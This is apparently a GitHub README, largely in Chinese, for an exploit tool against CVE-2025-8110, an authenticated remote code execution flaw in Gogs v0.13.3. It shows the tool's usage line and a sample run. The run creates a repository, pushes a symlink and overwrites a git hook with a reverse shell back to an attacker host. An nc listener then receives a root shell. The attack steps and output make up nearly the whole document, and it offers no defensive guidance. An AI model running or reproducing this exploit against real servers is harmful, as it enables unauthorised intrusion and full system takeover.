manbahadurthapa1248/CVE-2025-8110-Authenticated-Remote-Code-Execution-on-Gogs-v0.13.3-

# CVE-2025-8110-Gogs v0.13.3 认证远程代码执行 在 Gogs (v0.13.3) 上获取反向 shell 的远程代码执行漏洞 此漏洞需要认证凭据和 API 令牌才能生效。 # 使用方法： ``` kali@kali: python3 gogs_rce.py usage: gogs_rce.py [-h] -t TARGET -l LHOST -lp LPORT -e EMAIL -p PASSWORD -a TOKEN gogs_rce.py: error: the following arguments are required: -t/--target, -l/--lhost, -lp/--lport, -e/--email, -p/--password, -a/--token ``` ``` kali@kali: python3 gogs_rce.py -t http://target -l Listener_ip -lp 4444 -e hello@test.com -p hello123 -a token_here [*] Target: http://target [*] Identifying internal username from email... [+] Authenticated as: hello (hello@test.com) [*] Creating repository: pwn_rev_1775970279 [*] Initializing local repo and pushing symlink... [master (root-commit) 49428b8] link creation 1 file changed, 1 insertion(+) create mode 120000 evil.link [*] Fetching SHA and overwriting hook with reverse shell... [*] TRIGGERING: Check your listener on 4444... [master d027fb0] trigger rce 1 file changed, 1 insertion(+) create mode 100644 trigger.txt Enumerating objects: 4, done. Counting objects: 100% (4/4), done. Delta compression using up to 4 threads Compressing objects: 100% (2/2), done. Writing objects: 100% (3/3), 272 bytes | 272.00 KiB/s, done. Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0) [+] Push timed out (this is normal when reverse shell is active). [+] Done. ``` 这将为运行该进程的用户提供反向 shell。 ``` kali@kali: nc -nlvp 4444 listening on [any] 4444 ... connect to [ListenIP] from (UNKNOWN) [TargetIp] 39180 root@TargetIp:~/gogs-repositories/hello/pwn_rev_1775971368.git# id id uid=0(root) gid=0(root) groups=0(root) ```

标签：API令牌, APT, CISA项目, CVE-2025-8110, Git服务, Gogs, RCE, RuleLab, Web容器, 协议分析, 反向Shell, 命令注入, 开源软件漏洞, 攻击向量, 权限提升, 版本0.13.3, 编程工具, 网络安全研究, 认证绕过, 远程代码执行, 逆向工具